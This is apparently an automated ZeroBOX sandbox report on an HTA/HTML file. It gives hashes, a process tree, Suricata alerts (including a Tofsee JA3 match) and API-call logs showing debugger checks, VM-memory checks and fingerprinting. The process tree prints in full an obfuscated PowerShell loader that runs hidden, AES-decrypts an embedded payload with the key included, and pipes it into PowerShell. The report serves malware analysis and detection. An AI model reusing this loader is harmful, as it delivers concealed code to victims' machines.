Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 9, 2023, 10:46 a.m.	March 9, 2023, 10:48 a.m.

Size	1.1MB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`39d9214d90175864588feedc9e27b5b0`
SHA256	`2a2212e431abd080302c8b5dbd3c5278948bad873501b4c23f017f6c6cd0f338`
CRC32	`B70216BA`
ssdeep	`1536:dYlPliQoBfqsqjPCaW83sLDh/ViNQOLJ5eLJIm+lIWFB5HOo0j0ULcDdJP9ICWm0:GlliTBfqsqWaW83s3hVi2`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\htatest1.hta.html
3068
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409
  1188
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell - }
    1564
    - cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell -
      2504
      - powershell.exe powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv
        1328
      - powershell.exe powershell -
        2792

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 117.18.232.200:443 -> 192.168.56.102:49180	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49178 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49179 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 10:47 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 9, 2023, 10:47 a.m.			0	0
IsDebuggerPresent March 9, 2023, 10:47 a.m.			0	0
IsDebuggerPresent March 9, 2023, 10:47 a.m.			0	0

Command line console output was observed (14 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: Bad numeric constant: 72. console_handle: 0x0000000000000223	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: At line:6 char:3 console_handle: 0x000000000000022f	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + 72 <<<< yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkM console_handle: 0x000000000000023b	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: cd8NlM+J console_handle: 0x0000000000000247	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + CategoryInfo : ParserError: (72:String) [], ParentContainsError console_handle: 0x0000000000000253	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: RecordException console_handle: 0x000000000000025f	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x000000000000026b	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: Bad numeric constant: 72. console_handle: 0x0000000000000417	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: At line:7 char:3 console_handle: 0x0000000000000423	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + 72 <<<< yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkM console_handle: 0x000000000000042f	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: cd8NlM+J console_handle: 0x000000000000043b	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + CategoryInfo : ParserError: (72:String) [], ParentContainsError console_handle: 0x0000000000000447	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: RecordException console_handle: 0x0000000000000453	1	1
WriteConsoleW March 9, 2023, 10:47 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x000000000000045f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 130 events)

Time & API	Arguments	Status	Return
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000426870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e7b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e7b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e7b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41e4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b41ee40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000438480 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000438480 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000438480 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004384f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004384f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000426640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000426640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004384f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004384f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004384f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e040 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e040 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e040 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e040 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b44e9e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000349240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55e4f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55e4f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55ded0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55ded0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55ded0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 10:47 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b55ded0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 9, 2023, 10:46 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 9, 2023, 10:40 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 106947664 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 106953616 registers.r11: 106949424 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1902277881 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 9, 2023, 10:40 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
